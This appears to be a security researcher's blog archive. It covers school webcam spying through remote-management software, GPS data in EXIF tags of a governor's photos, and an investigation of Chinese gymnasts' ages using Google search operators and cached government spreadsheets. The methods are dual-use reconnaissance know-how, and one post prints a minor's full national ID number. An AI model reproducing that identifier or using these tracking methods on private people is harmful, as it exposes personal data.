I've removed Mr. Perbix's picture from my blog. I try very hard to stick to verifiable facts when I write here; this blog post is made up references to primary documents that show a verifiable pattern of action. But I feel that some readers are getting carried away. Myself and Aaron Rhodes spent hours reading forum posts, messages, and communications from Mike Perbix, his "digital shadow". The impression we both got was of a man who was charged with enormous responsibility, worked very hard, was very adept, and was fanatical about protecting kids and the assets he was charged with managing. I don't have all the facts yet, but the impression I got was of someone who was trying to build a state of the art capability and revelled in the promise of technology. If I had to put my finger on what when wrong here, I would say that someone cared too much. Personally I'm much more interested in who this capability was distributed to, and its persistent pattern of access, than I am in the person who built it. If you're reading this, please, let us not participate in a rush to judgement especially against a guy who worked this hard. Yes, he built the capability. Yes it was used. But if it was abused or simply misguided, that remains to be proven. I for one reserve judgement. For now, what bothers me most is this: When an organ of the State (in this case, a school) builds a system to conduct a search by activating webcams off of school grounds, the only way to determine if the ensuing search will be unreasonable or illegal is to conduct the search. The thought process behind that is unfathomable to me, no matter how much I read about it.

update 2/22/2010 8:30pm

I've created a network footprinting capability for parents, students, anyone who may be concerned that they are infected with the LANRev agent. The capability is documented in my next blog entry. One piece of feedback I continue to get is speculation on what can be seen in a packet sniffer. The answer for now is: not much. A block cipher and compression are in use in serial. It's a tough problem; we're working on it.

update 2/22/2010 5:30pm

In a strange twist, the makers of LANRev have come out with a statement saying that school network techs should never have used their software to engage in theft recovery:

"We discourage any customer from taking theft recovery into their own hands," said Stephen Midgley, the company's head of marketing, in an interview Monday. "That's best left in the hands of professionals."

I've watched the 50 minute screencast repeatedly, where Perbix describes his use of this feature outside of school grounds repeatedly during a conversation with Absolute Software employees. They were enthusiastic... now they're throwing LMSD under the bus? I believe this can best be described as intense PR spin. It also completely confirms what I've asserted here, that LANRev was the implant of choice for this school.

This investigation was conducted by myself and Intrepidus consultant Aaron Rhodes; Aaron deserves credit for a lot of these findings. -*-

The Technology Behind School Spying

2010-02-18T17:38:00.001-08:00

Ghost in the Classroom Machine

There's been a flood of news coverage regarding this lawsuit against Harriton High School in Lower Merion, PA. The charge, in short, is that school-issued laptops have been employed by school administrators to surreptitiously webcam-monitor children in their own homes via the use of remote control software, violating nearly every wiretapping statute on the books as well as potentially generating child pornography. While the school has already issued a formal apology regarding the use of remote monitoring technology, this blog post is an attempt to ascertain what technical methods were used to remotely monitor students in their home.

Think Spyware

The first step to identifying the particular spyware in use is to identify the platform. This school document identifies the hardware and software in use as Macbooks running OSX. What's the go-to spy product of choice for school administrators on the OSX platform? Apple Remote Desktop 3:

Possibly the most unfortunate product logo of all time

What proof exists that this product can be used for remote monitoring of students? Remote observation and control of target computers is plainly listed in the Apple Remote Desktop 3 Feature List. But the best evidence is this PBS documentary (about a different school), in which a high school assistant principal is shown listing, monitoring, and remotely taking pictures of high school students using Apple Remote Desktop 3:

Current Status, Current Application, Current User: Apple Remote Desktop

Five minutes, twelve seconds into the video:

"They don't even realize that we are watching. I always like to mess with them and take their picture."
-Assistant Principal Dan Ackerman

This story is only a day old, and if the published numbers are correct, nearly 1800 children and their families may have been exposed. I don't have information yet on what forensic traces this spying may have left on the computers, however, I can recommend best practices for any parent who believes their school system may be using issued hardware to spy on their children (in Lower Merion or elsewhere):

Understand that most laptops have a microphone and a video camera embedded, and that remote activation of microphones can be utterly silent.

If the issue becomes public, as is the case above, connecting the laptop to a school administered network or VPN may allow administrators to remove forensic traces of spying. Do not network the computer until evidence collection is complete.

Seek out a computer security professional or your helpful neighborhood hacker to perform a full forensic hard drive capture of the potential spy platform.

Consult a lawyer before confronting school officials. Capturing live network forensic evidence of remote spying can be far more powerful than word-of-mouth allegations.

This story is generating a lot of questions in the press, questions about how cameras should be deployed by schools in children's homes, and what guidelines should be set for their use. Personally, I believe these are the wrong questions. I believe the right question is: should students be subject to remote surreptitious monitoring by their school systems at all? Do we want our kids to grow up always wondering who's watching?

Big Brother: Remain EXACTLY where you are! Make NO move until you are ordered!
[painting falls from wall, revealing a telescreen]
Julia: Now they can see us...
Big Brother: NOW WE CAN SEE YOU!

Where's Arnold?

2009-10-12T20:40:00.000-07:00

Agent: This is Special Agent John Kruger. He'll be handling your personal security.
Lee: My protection?
John: New identity, relocation, I'll take you through it step by step.
-Arnold Schwarzenegger as Agent John Kruger, Eraser

Hiding your identity works great in the movies, but it's pretty much impossible for a public figure like Arnold. That said, there are some common sense privacy boundaries that heads of state need to observe, for instance: you probably don't want to be broadcasting your position in real time. For good or for worse, however, that's exactly what the Governator is up to these days.

Take a look at this recent Twitter post from Arnold Schwarzenegger's account, http://twitter.com/schwarzenegger:

Where is this happy oatmeal scene occurring? According to the photo, it was taken within the California capitol in Sacramento:

How is this happening? The answer requires you to think differently - less Sacramento and more Cupertino. Let's take a look at the EXIF data embedded in some of the governor's Twitter pictures, and see if we can find some interesting data:

Here's a picture Arnold posted of himself meeting with three other state governors. This looks like a lot of fun, so how could members of the public attend? Well, here's the result of dumping EXIF for this picture:

Arnold's iPhone 3GS comes standard with a compass, a GPS, and a critical remote SMS vulnerability. We can see from this data that Arnold has patched the SMS exploit by updating his iPhone to 3.1, so we can't text a rootkit until Charlie shows up in Canada again. In the meantime, let's see what else we can learn.

In this picture we can clearly see the compass orientation, giving us some direction data for the camera, and even better, the current best GPS fix available on the handset when the picture was taken. This should make it easy to build a Governator-tracking app for the iPhone. I'm counting this blog post as prior art.

Converting and punching this GPS data into Google Maps is pretty easy.

So what does all this GPS tracking data mean for the rest of us? A whole lot less than it does for the Governator. While uploading a realtime public location history might be considered a security risk for a state leader (though in this case, apparently not...), for most people it's a convenience. The iPhone itself has a security model for photo GPS data that's extremely permissive: grant once, allow forever. Turning off embedded location data in iPhone pictures requires remembering to trip a switch to globally disable GPS, then turning it back on when you're done. And if you forget, there's no way to strip or view the hidden location data while it's on the phone. Privacy? There's no app for that. Unless you're jailbroken, in which case there might be, but on the downside Apple thinks very differently about those caught escaping from their gilded jail.

I for one can't help but recall Mayer-Schönberger's assertion that computers must learn to forget. What's called for in this case is transparency and proactive forgetfulness. If users want to embed and share their location data, they should be able to, however a single Opt-In on the camera app doesn't share nearly enough data with the user about the unintended consequences of location data leakage.

Perhaps Twitpic should give users the option to strip location data, the iPhone should add a similar switch, and the Governator should accept my modest professional recommendation that he purchase a hardened Blackberry. I'm not claiming it's secure, but it might be a step in the right direction, and hey, it's very presidential.

-stryde.hax, 10/13/2009

update A reader points out that Gadget Girl has spoken to this issue some already and located some EXIF stripping apps. Details TBD.

Yang Yun Speaks Out

2008-09-22T09:30:00.001-07:00

"I was only 14 years old"

I'd like to conclude writing about the age controversy in Chinese gymnastics with this document. Produced by Heather Lawver and Cindy our volunteer translator, here for the first time in English is Yang Yun's confession to having cheated at the 2000 Olympic games in Sydney. While Marion Jones does her time in prison for cheating, Yang Yun still holds her Olympic medal. This video lets us put to bed once and for all the question of whether China's government has issued false documents that have allowed their gymnasts to win medals. The only question left is: how many times have they done it?

While the Internet has made electronic identity easier to wipe out and easier to censor, it has also made the distribution of truth much harder to suppress. In conclusion, here's Yang Yun in her own words. I'm very proud to have worked with so many people around the world on this project: a sincere thank you to everyone who helped.
-stryde.hax

A Conspiracy in Plain Sight

2008-09-02T20:58:00.000-07:00

A Land of Make-Believe

Who can forget Marion Jones? Seven years after she won gold medals in the Olympic games in Sydney, she was prosecuted by her own government for her role in an illegal steroids distribution ring. Sentenced to a jail term of six months for lying to federal prosecutors about her involvement, she is still currently in jail. After her admission of cheating she was stripped of every Olympic medal she ever won.

The reality of Jones's fate is not what I'm writing about today. I want to write about a land of make believe. Pretend for a moment that Jones went on to tell everyone that she cheated in the Olympics on film in a movie about her life. What if Jones went on to become a television reporter, and the mayor of her town gave a speech about her Olympic performance in which he bragged about her steroid use? And what if nobody cared? That would be a very interesting, very different world, wouldn't it?

We're Living In It

Consider for a moment the strange case of Chinese Olympic gymnast Yang Yun. Competing in the same games as Jones in Sydney, Yun won the bronze medal on the uneven bars. Soon thereafter, she was featured in a state sponsored documentary film, "Yang Yun: My Olympics". In this film she states that she competed as a 14-year-old at Sydney, two years underage. A confidential source forwarded me a copy of this film recently, and I have posted it at the Internet Archive. If Yang Yun's videotaped admission isn't enough, consider this jubilant speech still hosted (for now!) on the government web server sports.gov.cn. How old is this document? Annual copies have been saved by the Internet Archive dating back to 2002. The Google Translated version from 2002 is in agreement with the currently hosted version. This document is a transcript of a speech given 17 October 2000 by Fu Guoliang, the head of the Hunan Provincial Sports Bureau, to his colleagues. In addition to the automated translation, I've had this document inspected by multiple contacts who speak Chinese because of the translation subtlety I'm about to share with you.

体操运动员杨云实际年龄才１４岁，在悉尼初试身手，
就引起体操界的注目并夺得一枚铜牌，前程不可限量。

Gymnast Yang Yun's real age was only 14. She tried 
her hands in Sydney for the first time and attracted 
the attention of the gymnastic community by winning 
one bronze medal. Her future is limitless.

translation courtesy Cindy

For those who are skeptical, please download this document straight from the government web server it's hosted on and translate it on your own. Google Translate and World Lingo do a pretty good job. The translation above is spot on: Guoliang is really saying real age, a differentiation one would not normally make. In fact, in the entire course of this speech, he never once uses the phrase "real age" when referring to the age of other gymnasts. Is it conspicuous that the phrase "real age" is used to qualify the age of a gymnast who competed under a government issued passport with a completely different birthday? Whether this distinction is made in order to emphasize that her actual age is different from the one on the passport she competed under, or in order to differentiate between the Chinese cultural traditions of "real age" vs. "virtual age", the point is clear: Yang Yun competed at fourteen years of age. How stunning is it that this is a point of pride to a government official?

In Plain Sight

Is this information a conspiracy? A big secret? Take a look at this message board listing posted by insiders within the Chinese gymnastics team:

这个时候是不是不太方便谈这些关于生日、年龄的事，
尤其是两大UB高手的，免得被间谍抓到把柄//

Talking about these birthday and age matters isn't 
too convenient right now, especially for the two 
big uneven bars aces [He Kexin and Yang Yilin], 
to avoid having (the information) grabbed by spies.

Certainly someone thinks there's still a need for secrecy. Personally, I'm no longer so sure. It may come as a shock that every 'revelation' in this entry was uncovered months ago by Diane Pucin. Her article received the same reception from the IOC as my blog: a cacophony of silence. Certainly Marion Jones needed to be concerned about 'spies'. However I believe the Chinese gymnastics team need fear no such threat of justice.

Which Reality?

Taking a look at the two different experiences of Jones and Yang, it's easy to conclude that a double standard is being applied. As Sally Jenkins so deftly points out, the IOC once barred Greek sprinter Ekaterina Thanou from competition simply for a pattern of doping offenses, despite her having tested negative for the Games. Given the documents above, does the Chinese government have a history of age falsification in gymnastics? Can a reasonable person conclude that there is a pattern? And if so, how do we explain the double standard?

One Standard

The answer, of course, is that the IOC is much smarter than we are. They are applying a single standard: What The Government Says Is True. The US government declared Jones a cheater, and the IOC applied their standard and stripped her medals. The Chinese government maintains that their gymnasts are of age, and the IOC again applied their standard and agreed. It seems that someone at the IOC is a fan of great literature, and is making an exercise of applying the classics:

He who controls the present, controls the past. He who controls the past, controls the future.

An Identity Erased

2008-08-26T21:20:00.000-07:00

Another One Bites the Dust

Two days ago, I challenged the Chinese government to a race. I posted a link to a government spreadsheet hosted on a government web server which contained the name, age, sport, and government ID number of Jiang Yuyuan, another member of China's Olympic gymnastics squad, which showed that she competed underage. After having carefully collected a series of verifiable mirrors of the document, I linked to it for public download. And now that citizen journalists (and professional journalists) all over the globe have downloaded it and verified it en masse, the the document finally got deleted nearly two days later. Now to be purely objective I should probably state that I can't verify the reason for deletion, but at this point the options seem limited. An Excel spreadsheet going back years containing over twelve thousand athlete names vanishes 48 hours after I publish a link to it? That's no accident. Personally I don't think 48 hours is a very good level of effort for a professional censor, but then I've never done that type of work. So I'm interested in what you folks have to say. So here's my poll, let me know if you think 48 hours to censor deserves a Gold, Silver, or Bronze medal.

Here's what censorship looks like:
http://www.zjsports.gov.cn/zjty/node12/node43/userobject1ai4698/00000002.xls

And here's what freedom looks like:
MIRROR : wikileaks.org
MIRROR : Internet Archive
MIRROR : UCLA News Radio
MIRROR : heathershow.com

UPDATED Consistency Problems with Cui Dalin's Statement

2008-08-24T21:33:00.000-07:00

updated 8/25, scroll down for update

From the New York Times article published Aug 24:

Cui Dalin, the vice minister of the General Administration of Sport of China, said He Kexin, the uneven bars Olympic champion, had moved from one team to another last year, and a wrong birth date was written on the registration forms for the new team.
“During the registration, there were some discrepancies in the age of the athlete, therefore that mistake has led to a series of misunderstandings afterward,” Cui said during a closing news conference for the Chinese sports delegation here. “I can say for sure the age of the Chinese gymnasts comply with the rules.”

I think we can all breathe easier now that officials are beginning to address the problems that so many have observed. However having spent some time studying the documents, I'm concerned about what I perceive to be a discrepancy. The alleged mistake led to at least three separate Excel spreadsheets, now deleted, showing a birthday for Kexin of Jan 1, 1994. This in itself is interesting. However my interest is in Cui's statement that the change occurred "last year". Last year was 2007, and as alert readers of this blog will recall, the Internet Archive has kept two copies of a document published to sport.gov.cn which establishes Kexin's birthday as 1-1-1994. The problem here is that the Internet Archive saved one of these copies in June of 2006, two years ago. Additionally, when the document was stored in the Internet Archive, the document contained a publication date of January 27, 2006. Neither of these dates is in the least bit consistent with Cui's statement.

update 8/25

And that's just the beginning of the problems with Cui's statement. I'll start with a summary, and I'll follow with documents. On this blog, I've listed (over time) four different documents: three Excel spreadsheets and a web page, all deleted from www.sport.gov.cn, the General Administration Sport China web site, and they are all available mirrored or cached online. Two of the documents are after the team transfer that Cui is referring to in his statement: these are the zctc.xls documents. One of them is the web page that documents the team transfer of He Kexin, this is the web page saved in the Internet Archive. The most important document, however, is 05ticao.xls, still saved in the Baidu cache at the time of this writing. Turns out "ticao" is the Pinyin for "gymnastics", so this document is basically "05gymnastics.xls". It predates the team transfer that Cui is speaking to. And all four documents show He Kexin's birthday as Jan 1 1994. How can a mistake a "year" ago made during a team transfer have affected He Kexin's records well before the team transfer, in 2005? Here's a link to Baidu cache of 05ticao.xls (this will expire someday soon, I'm reserving this space for a mirror link). It's a registry of gymnasts for 2005. For the following sectoin, you can copy and paste to search within the document to follow along. The document tells the gymnast totals:

注:总注册1016人;其中确认676人;首注329人;交流11人.
Total registration 1016 people, among which 676 
people were previously registered, 329 people are 
first-time registrations, and 11 people are "exchange".

These exchanged gymnasts are the exchanges that Cui is referring to in his statement, however, this year was not an exchange year for He Kexin. This was He Kexin's first registration year, see row 799:

799,"何可欣","女","1994.1.01","北京","北京","北京市体育局","首注"
799, He Kexin, F, 1994.1.01, Beijing, Beijing, 
Beijing Municipal Sports Bureau, First Time Registration

Next the document identifies its originator:

体操中心体操部
(Gymnastics Center, Gymnastics Section)

And finally, the document contains its signing date:

2005-3-17

Cui's statement is not a reasonable explanation for the discrepancies that have been found. This list of gymnasts for 2005, published by Cui's organization, the General Administration of Sport China, lists He Kexin as having been born in 1994 during her first time registration. This is before her transfer in 2006, which is listed in this athlete exchange agreement archived by the Internet Archive in 2006. The team change that Cui cites in his statement as having happened a year ago actually happened two years ago, and He Kexin's original registration with a 1994 birthday in early 2005 is far too early to be explained by a mistake "last year".
end update

Now that Chinese officials have broken their silence on the inconsistencies that are surfacing, I'm hoping we can all expect a statement soon on the case of Jiang Yuyuan, whose name and government ID number appear in a government-hosted spreadsheet I linked to earlier this evening. Alert readers will of course realize that Chinese government ID numbers embed the birth date, hence the string "19931001" inside this government ID number should be addressed in any future clarifications.

In conclusion, here are links to the Internet Archive's 2006 copies of the athlete exchange agreement hosted on www.sport.gov.cn, Ciu Dalin's General Administration of Sport China.

Internet Archive history of document
Translated version of 2006 copy

Ready, Set, Censor!

2008-08-24T13:51:00.001-07:00

Are you faster than the delete button?

DOCUMENT:
http://www.zjsports.gov.cn/zjty/node12/node43/userobject1ai4698/00000002.xls

DOCUMENT METADATA:
Size: 3438080 Bytes
SHA-1 Signature: 1e1ee2513116b729b927a056cae1af9e87bdfc7e

DOCUMENT SOURCE:
Zhejiang Provincial Sports Administration
http://www.zjsports.gov.cn
IP Address: 60.191.63.85

DOCUMENT MIRRORS:
Mirror @wikileaks Courtesy Dan Schmitt
Internet Archive (Direct Download)
UCLA Radio Courtesy Carey Shenkman
Mirror @www.heathershow.com Courtesy Heather Lawver

DOCUMENT ANALYSIS:

Registration Number: TC2001C017
Name: Jiang Yuyuan 江钰源
National Id Number: 330302199310013648
Gender: F
Date of Birth 10/1/1993
Training: Gymnastics

Jiang Yuyan's Wikipedia page states:

After beginning her gymnastics career 
in Guangxi Province, she transferred to the
Zhejiang Provincial Team in 1999

SCREENSHOTS:

Highlight of row 11279, showing Jiang Yuyan

Screenshot of the WorldLingo translation engine, with the name from row 11279 pasted in.

Credit where credit is actually due

I am dedicating this post to my anonymous source, without whom this would not have happened, as well as the large Internet community within China whom I believe started this investigation at much greater risks to themselves. In addition I'd like to cite four articles which pre-date this blog which cover a lot of the same material, though with a different presentation. It's impossible for me to know if I've run across the same or different documents than these reporters, because I've never had access to their urls. That said, these folks were covering this story long before I ever tried to learn anything about it.

NY Times (Jere Longman and Juliet Macur)
LA Times (Diane Pucin)
Huffington Post (David Flumenbaum)
Associated Press (Nancy Armour and John Leicester)

What Now?

This has been an exhausting week. I honestly don't know what there is left to do, after posting this document. It's an original document straight off a government web site, with government id numbers, birth dates, etc. There are over ten thousand names and hand entered details. How could anyone ever forge something like that? It would take an army to gather that amount of detail and make it stand up to scrutiny. I think I'm going to grab a beer and watch this young woman's identity vanish into thin air. If you're watching it with me, think about our upcoming American elections, which are going to be decided by voting machines which generate only electronic documents. Think about the permanence and weight of electronic documents. And think about a future in which our identities are purely electronic. Cheers!

update An article from 2007 which states that He Kexin was 13 at the time (making her 14 in 2008) is still hosted on a government website. Which would make five documents regarding Kexin, for anyone counting.

Watch Government Censorship Live!

2008-08-24T07:24:00.000-07:00

Here Goes Nothing

I have received a tip from an insider within China. What I was sent is a link to a government document which is still hosted on a government web server. I have downloaded it and done as much due diligence on it as I am able, and the results are amazing. This document contains a much deeper level of information on a Chinese gymnast than was previously available. I am in the process of asking trusted helpers to mirror this document and vouch for it.

1984 in Prime Time

What I am going to do is this. At exactly 1800 Eastern Standard (2300 GMT), I will post a direct link to a primary document hosted on a government server in China. Then, we will have a race. We will see how many people can download and verify this document before it is wiped out. And for those watching, you will have a chance at a glimpse of our possible shared future: the erasure of an entire identity.

At What Risk?

I may end up with egg on my face here. It is possible the folks at the Great Firewall will detect my Internet activity and delete the document before I release it to the public. I am willing to take this risk. I have a copy, I will swear to its authenticity. I have uploaded it to wikileaks with a delayed release. I believe the opportunity is worth the risk. I hope you will join me.

-stryde.hax

And Then They Were Gone

2008-08-23T18:47:00.000-07:00

Dude, Where's My Cache?

Remember when this all began, four days ago, I asked the world to cache the documents discovered in the Baidu cache, just in case they disappeared? Well sometime between last night and today, they did just that. A day after the Wall Street Journal was able to retrieve a copy from the Baidu cache, it dissappeared. Here are the original links: cache1 cache2. Surprisingly, the document I linked in a subsequent post is (at the time of this post) still present: cache3. Does this removal necessarily mean malfeasance? We can't be certain, as all search engine caches have a timeout period, in which older documents are expunged. Maybe this was just the natural timeout period of the documents, maybe not. Either way, it now becomes imperative to build mirrors of the third document, cache3, as we can reasonably expect it to dissapear soon.

The good news is, hundreds of people mirrored these documents before they were removed, and can vouch for what they saw. Here are just a few of the massive outpouring of volunteer mirrors that showed up in the comments section:

Behind the Wall?

I've received so much information in that last few days I don't know how to get to it all. Here's a small excerpt of an email I received from within China:

As a fellow resident in China, some 60 miles north of Grace, I must say that Grace's comment is at least partially correct. China is in many ways a wonderful place. However, I must take factual exception to some of her statements. While your blog has not been discovered by authorities yet, if I do a search for "NYTimes and underage gymnasts" on Google my internet connectivity at home is suspended for 15 minutes, and I am unable to establish any outside connections to ANY website from any computer in my home. In addition, while researching the gymnasts scandal, my internet searches routinely turned up blank pages for well known sites whose uptime is better than four 9s and my internet connection was suspended several times for 15 minutes each

Like the earlier email from Grace this one is impossible to verify, but the assertions made within are repeated often by those living within China.

Full of Sound and Fury, signifying...?

In the end, what does this all mean? Aside from the three spreadsheets I found, there is this fourth document, hosted by the Internet Archive, also hosted by the General Administration Sport China (www.sport.gov.cn), also currently missing, which states that He Kexin's birthday is Jan 1, 1994. That's four documents removed from the same government web server that are all in complete agreement about He Kexin's birthday. Stored on multiple web servers around the world! In fact, the Internet Archive keeps a history of when it stored its document copies, and it goes back to the year 2006, showing two separate, identical retrievals of the now-removed document. And what of the amazing Huffington Post article which predates my blog, showing screenshots of official news reports in which He Kexin's age is suddenly changed from 14 to 16, and a list published by the Chengdu government showing He Kexin's birthday to be, again, Jan 1 1994? What can we do with this vast preponderance of electronic evidence, all of which has been removed from the servers that once hosted it?

A Future Yet to be (Re)Written

We live in the Information Age, and we are facing a future in which all documents will be electronic. Doubtful? Later this year, American voters will elect a president using electronic voting machines which don't leave a paper trail. Americans can sign up now for bank accounts which are completely electronic and generate no consumer available paper records. And most DMV's, state agencies for issuing official id, are online now. A future of electronic records? We're living in it.

No Proof

If you receive a printed bank statement one month that says you have $3000, and the next month it says you have $2000, you can take both statements to court. If you have online banking, what do you take to court? If you vote electronically, what is the standard of proof for an audit? How can anyone prove the validity of a digital document? That was the question I faced four days ago, and my ad-hoc solution of community mirroring shows the dearth of solutions available to the public. The nature of digital documents has changed irrevocably, and our institutions have failed to keep up. Digital documents are invisibly malleable and non-persistent.

Invisibly malleable. The art of paper document forgery is as old as art forgery, dating back hundreds of years. Meanwhile digital document forgery is as easy as changing one number in a spreadsheet, and right now we lack the tools to track these changes. The coming wave of remote application providers like Google Docs might someday be able to provide us with a chain-of-trust type solution to this problem, but that day is a long way off. In the meantime, we face this problem with voting machines, where digital changes to vote tallies cannot be detected. The public deserves a solution to this problem, and it is a challenge for the information security industry to provide it. For now, I favor paper verified voting.

Non-persistent. The problem of non-persistence is the problem that the international community is now having with the electronic documents mentioned in this blog and elsewhere regarding He Kexin's age. In the blink of an eye, a document can be removed from the web server that hosts it, and someone seeking to prove the historical existence of that document has no recourse whatsoever. In a future in which all identity documents are electronic, does that mean that someone's identity can be erased? I would answer with a question: is He Kexin being erased, or overwritten? I'll let anyone who has read this blog reach their own conclusions in that regard. But again, I challenge the information security community: we need a solution. Recently my colleague Mike Zusman and researcher Dan Kaminsky gave presentations at Blackhat highlighting fundamenatal problems with the mechanisms that allow Internet users to trust that they are arriving at the web site they requested. These problems are related: how do we verify sites, and how do we verify documents hosted on sites? DNS security, SSL security, and the unfilled need for a legally admissable Internet Notary that can prove the historical existence of electronic documents. These are the solutions to the problems I've encountered this week. These are the solutions which can keep our elections safe, and preserve our culture of verifiable documents. I for one look forward to a future where innovative solutions to these problems are available to the citizens of the world.

-stryde.hax

Check out this recently submitted link from an anonymous user comment, in English! "14-year-old newcomer to the national team"! Google Cache

No longer anonymous. The above link was submitted by Jody Lanard M.D.

Citizen Journalists Take the Lead

2008-08-22T11:56:00.000-07:00

Look what YOU found!

I've been reading the comments posted to this blog with great interest. What follows are comments that I found exciting and intriguing.

BrittleBlogger said...

Following your lead i have just translated the header in these documents (see below). This shows that the document that you translated is not just the results of a competition it is the NATIONAL REGISTER of gymnasts. This evidence is getting pretty damning!

"Gymnasts reported in 2005 the National Registry Page"
    "2005 National Gymnasts reported registry"
    "No.", "name (in)", "Sex" and "Date of Birth", "native", "birth" and "registered", "Remarks"

Please note: this translation has not been verified by a Chinese language expert. I am still hoping to get in touch with a language expert who can provide trusted analysis of these documents. -Stryde

Ronald said...

Update:
Do this search :
http://www.google.cn/search?complete=1&hl=zh-CN&inlang=zh-CN&client=aff-sina&channel=hpsearch&hs=D5Q&affdom=sina.com.cn&q=%E4%BD%95%E5%8F%AF%E6%AC%A3+1994+site%3Awww.sport.gov.cn&btnG=Google+%E6%90%9C%E7%B4%A2&meta=&aq=f
You'll see this reference:
http://www.sport.gov.cn/show_info.php?n_id=14342
Of course it's not there, but in comes the wayback machine:
http://web.archive.org/web/20070630205138/http://www.sport.gov.cn/show_info.php?n_id=14342

This is an absolutely amazing find by Ronald. What you're seeing above is a document which was removed from the Chinese government server www.sport.gov.cn, listing He Kexin's birthday as 1994-1-1, saved in The Internet Archive (last link). The Internet Archive is a U.S. based non-profit organization which collaborates with the Smithsonian and the Library of Congress in its mission to perform historical web document preservation. This is just one more document source to pile on top of Google, Google.cn and Baidu. Take a look at the Google Translated version of the Internet Archive's copy of this document, and try to look up He Kexin's age for yourself: Link
-Stryde

Grace Xiong said...

I am a Chinese girl.After scanning your articles,I must say I take my hat off to you,for your spirits and efforts to find a truth.Many many Chinese are supporting your behavior.The olympic should not be cheated!But there is one thing I have to tell you (after seeing some comments on your blog..) ,China isn't as some dear westerners'thinking that she is a autocratic, no-human-rights country.She is a great and magic country,and her people are very kind. Her people have the freedom to say whatever they want. People like you will get many respects here and Chinese government will not do someting bad to a person who is praiseworthy. I am at home now(you can check my ip,I am in Hangzhou,Zhejiang province),I can surf the internet ,scan your article,leave my comment just as all of you,it may be another truth people should accept. Thank you all the same ,for what efforts you have made for a better China!

Grace's post speaks for itself. -Stryde

What now?

I believe the media wave has at last crested. From here, hopefully, I can continue to focus again on this research and where it leads.

The day after the Day After

2008-08-21T18:28:00.000-07:00

Fifteen minutes is a really long time

First an apology for not updating this blog in a timely fashion, for not responding to all my emails, and for the delay in approving comments. In my defense I can say only that I have found my blog and my findings at the center of an international media maelstrom. I never set out to change the course of the Olympics; I set out as I always do, a curious researcher, intent on the search for truth and the knowledge I could acquire along the way.

A thank you is in order to everyone who has helped me to catalog and establish the existence of these documents. There are so many of you now, I don't know how I can thank you all. But I believe that you have acted in a spirit of truth-finding and openness, and I thank you for that.

I have received a flood of information through my email in the last few days, and I'm way too behind to list all of it. However I feel it is a priority to mention that I am not the first blogger to have started investigating this controversy, and there are rumors that people within China have been blogging on this topic in the weeks preceding my post. Specifically this blog by BillyPan is full of meticulously archived screenshots, news clippings and web pages, and while I can't read the language, the pictures tell a very detailed story. I encourage everyone to have a look.

And now for a bit more content

I've gotten a lot of feedback about the appropriate way to get all three documents, still available from the Baidu cache at the time of this posting, into Google Translate correctly. The missing link here is that when you first copy the information out of the spreadsheets, they are covered in quote and comma characters, which messes up the translation. Groom out the punctuation and enter it into the translation box and you should end up with something like the screenshot below:

That's the three lines in question, from the three documents in question. At this point, I'm going to take a step back, let the experts analyze these documents, and see what the consensus is. I've done my part; citizen journalists of the world, this story is yours now!

Olympic Hacking Part II - Let's go for the Gold

2008-08-20T11:06:00.000-07:00

The Day After

This blog has gotten a lot of feedback in the last 24 hours. If you haven't read the original story, read that first to catch up. Today, the story continues.

In addition to the outpouring of mirrors and support for preserving the information I discovered, I've also received some very helpful information from other Google hackers. Specifically, I was encouraged to check out the Chinese version of Google: google.cn. Presented here are the results, not all of which I can take credit for.

What about google.cn?

When I woke up this morning, I ran my existing search string against google.cn. Interestingly, I got back two spreadsheet results: the original spreadsheet I blogged about, zctc.xls, and a new spreadsheet I hadn't previously discovered, 05ticao.xls. Here's a screenshot.

A few hours later after moderating comments, I refreshed my search. And wow, was it eye opening.

Expunged entirely from google.cn's search index is my original find, zctc.xls. Down the memory hole. If the documents are false, why remove them? Why wipe their existence from the search index? I was intrigued. I decided to follow the trail of the second spreadsheet, 05ticao.xls.

Always one step ahead of me, the document was again missing from its original home, the home page of the General Administration of Sport of China. Undeterred, I decided to look again to Baidu to see if I could retrieve the results.

Could it be? More documentation? I followed the document cache link...

There's He Kexin again, listed with a birthday of 1-1-1994, fourteen years old. Running that line through Google Translate, the chances of a case of mistaken identity diminish rapidly:

799, BB He Kexin CC female AA 1994.1.01  Beijing and
Beijing Beijing Municipal Sports Bureau, First Note

It is my suspicion that First Note is a mistranslation of First Place, as her world class gymnastics record speaks for itself. For those working to cache these documents, the direct link to the Baidu cache, for as long as it lasts, is here: cache link (update Baidu cache is dead now, here's a mirror at heathershow.com.

Conclusions

What is this post really about? I don't really feel that it's about the gymnastics age limit, or even really about whether fraud occurred. At this point, I believe that any reasonable observer already understands that age records have been forged. This story now is really about Internet censorship, the act of removing evidence while at the same time claiming that the evidence is wrong. For the first time I watched search records shift under my feet like sand, facts draining down a hole in the Internet. Will this stand?

For those interested in pursuing facts on their own, I should at this point cite my inspiration. If Johnny is the godfather of Google hacking, then his seminal book on the subject can be considered the bible of the field. There's nothing I've done here that you can't teach yourself from that book. Who knows what else can be accomplished; I am one, but You are Many. Good luck.

Updates

The power of crowds is already hard at work. Check out this link found by Digg user Karate3409, posted in the Digg story on this blog: Link.
```
10 何可欣 He Kexin 女 F 1994 11 1994  1  1  北京体育局
Beijing Sports Bureau 武汉体育局
Wuhan Sports Bureau 2年 2 years
```
That's a nice piece of research!

I have no affiliation with this book, make no money from referrals, and all profits from its sale go directly to the organization Hackers for Charity. If you want to know where I got my start, well, there you go.

Hack the Olympics!

2008-08-19T13:22:00.000-07:00

There's been some widely publicized controversy regarding the competition age of the Chinese women's gymnastics team recently. Rather than be too CNN, I decided to take a page from my friend Johnny and investigate on my own. I have an Internet connection, that means I should be able to verify the age of the gymnasts in question with primary state-issued documents and find out for myself if someone's cheating, right? Right. Let's go to work.

First, the rules.

Gymnasts must be 16 to compete. This means they must be born in 1992 or earlier.
Only publicly available, primary, linkable information can be used.

Who are we talking about?

Let's take a look at He Kexin (何可欣). Her Chinese issued passport lists her birthday as 01/01/1992, 16 years old and old enough to compete. However, allegations cited on her Wikipedia page put her birthday as 01/01/1994, fourteen years old and not eligible for competition. Which is the truth? Let's find out.

Let's ask Google!

First, we'll search all Chinese web sites for Excel spreadsheets containing He Kexin's name and the word 1994. (site:cn 何可欣 filetype:xls 1994). This seems like a pretty good search. Try it yourself! Here's what Google gives us back, one measly hit:

Wow, an Excel spreadsheet hosted on an official Chinese government web site (http://www.sport.gov.cn/files/jts/reg2006/zctc.xls) that contains the official birthday for He Kexin, awesome! Unfortunately, when you click on it, it's been removed.

That's strange. Fortunately, we can click on "View as HTML" in the Google cache and see it. However, even though the Google search results indicate that He Kexin is listed in the spreadsheet, when you view Google's cached version, her name no longer appears.

What a strange software bug!?!? Oh well, I guess we should give up. Right?

